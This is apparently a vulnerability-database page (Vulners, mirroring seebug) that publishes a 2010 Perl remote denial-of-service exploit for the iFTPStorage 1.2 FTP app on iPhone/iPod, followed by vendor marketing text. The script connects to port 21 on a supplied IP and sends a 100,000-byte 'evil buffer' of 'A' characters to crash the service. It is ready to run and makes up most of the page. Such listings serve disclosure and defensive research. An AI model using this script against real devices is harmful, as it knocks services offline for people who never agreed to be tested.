Lucene search
K

iFTPStorage v1.2 for Iphone\Ipod - Remote Dos Exploit

🗓️ 22 Feb 2010 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 12 Views

iFTPStorage v1.2 for Iphone\Ipod - Remote Dos Exploit, vulnerability in iFTPStorage app, supports Iphone 3GS with 3.1.2 firmware, also vulnerable in iFTSTorage Lite

Code

                                                #!/usr/bin/perl
 
#
 
# Exploit: iFTPStorage for Iphone\Ipod - Remote Dos Exploit
 
# Date: 20/02/10
 
# Author: Ale46
 
# Software Link:
 
http://itunes.apple.com/us/app/iftpstorage/id333357690?mt=8
 
# Version: 1.2
 
# Tested on: Iphone 3GS with 3.1.2 firmware
 
# Note: iFTSTorage Lite is also vulnerable
 
# Greetz: Gandalf
 
 
 
use IO::Socket;
 
 
 
if (@ARGV<1){
 
        print ("Usage: ./iFTPStorage <server_ip>\n");
 
    exit();
 
}
 
 
 
my $host = $ARGV[0];
 
my $port = 21;
 
my $stuff = "A"*100000;
 
my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
 
PeerPort => $port);
 
unless ($socket) { die "Can\'t connect to $host" }
 
print "Sending evil buffer..\n";
 
sleep(2);
 
print $socket $stuff;
 
sleep(2);
 
print "Crashed..";
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation